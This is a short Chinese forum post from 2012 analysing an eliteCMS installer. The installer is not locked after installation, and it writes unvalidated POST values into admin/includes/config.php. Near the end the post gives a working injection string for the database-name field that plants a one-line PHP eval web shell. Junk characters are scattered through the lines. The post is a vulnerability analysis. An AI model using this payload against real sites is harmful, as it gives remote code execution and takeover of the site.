eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
+ e$ ~' ]2 g9 S7 ~9 q8 y
! P! d4 V% t. O; k' f7 W8 J! R另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php+ E/ Q! J' n d, D3 p. h' ~. y7 i
我们来看代码:
1 j1 d) h2 z3 E! l. } . L' \, R# A5 ~6 T& l1 @8 k
..., |- K+ W6 z! z
elseif ($_GET['step'] == "4") {
! f( M1 _ c# r/ X) H $file = "../admin/includes/config.php";9 L# R$ H' S4 V/ k- K
$write = "<?php\n";
0 T4 u5 y$ M3 G; H# V7 |# I3 ?' | $write .= "/**\n";
, f9 W$ e1 ]; F. ~ $write .= "*\n";& q0 Q2 t7 a5 T% n( I& |/ \. d
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
: K6 _% `+ I& O) `...略...% k5 b; h5 {$ k6 | C8 v: h
$write .= "*\n";
. m% E. W/ m* L $write .= "*/\n";
8 r1 M6 M2 |% H $write .= "\n"; o6 U5 e( m9 b" r/ I9 k7 M
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";% S# S+ ?( U; X; H3 H- {
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";2 a8 |, M% x, L- l c* _
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
. A0 m) L" j. ?) H: c4 J $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
3 ]% @5 w# G( t, u $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";6 k: f* _) C+ v7 @' d
$write .= "if (!\$connection) {\n";
/ L, D! i7 B8 g) X' t $write .= " die(\"Database connection failed\" .mysql_error());\n";
% ^9 P) X4 j& a, ~* c* G9 Y $write .= " \n";
+ V0 t3 c' `" A3 G& y( ~8 q$ n- k9 k $write .= "} \n";$ t% b$ f8 R- k8 h5 k
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
7 G& v% y- C$ ]2 ? $write .= "if (!\$db_select) {\n";! v1 e' l h; ~' d
$write .= " die(\"Database select failed\" .mysql_error());\n";. C) m6 x' x4 J; Z+ I' }6 p
$write .= " \n";
; o. c" a k! x# p" _ $write .= "} \n";
- E' K( D4 X2 q J2 u* W $write .= "?>\n";
7 f4 d6 p; k* _; R+ K% a% k , ?+ P$ Q2 q; P3 K: a
$writer = fopen($file, 'w');
, d5 f4 f/ Z2 o$ @$ ?...
! B6 o0 K; q9 D
" ?' B& ^% V( r' S8 W, {在看代码:
+ X9 @! F9 S9 C& }
# m J9 ]' s5 a$ Y& g: f0 u$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
. B# z ~1 e+ [9 B% V$ J9 t$_SESSION['DB_NAME'] = $_POST['DB_NAME'];+ S- L& e) ]# V3 }2 D
$_SESSION['DB_USER'] = $_POST['DB_USER'];
# D/ \! D% Q+ ~8 p8 v/ |$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
( F& X9 k" K [4 A
! Y8 B3 T/ s* o% n5 j- U取值未作任何验证9 r( Y; l$ _$ a$ X2 L+ P# x
如果将数据库名POST数据:! }. e! V% S1 A
3 H0 P0 X$ y; Q# `* O' M4 |1 }; f
"?><?php eval($_POST[c]);?><?php, O+ x' A4 r$ }/ |. Z4 ~ n- H
& X8 E" g7 Y! c% l: h将导致一句话后门写入/admin/includes/config.php
8 x0 C8 p) N2 J3 V3 m; i4 Y8 Z- V |
发表于 2012-11-18 13:59:27
收藏
支持
反对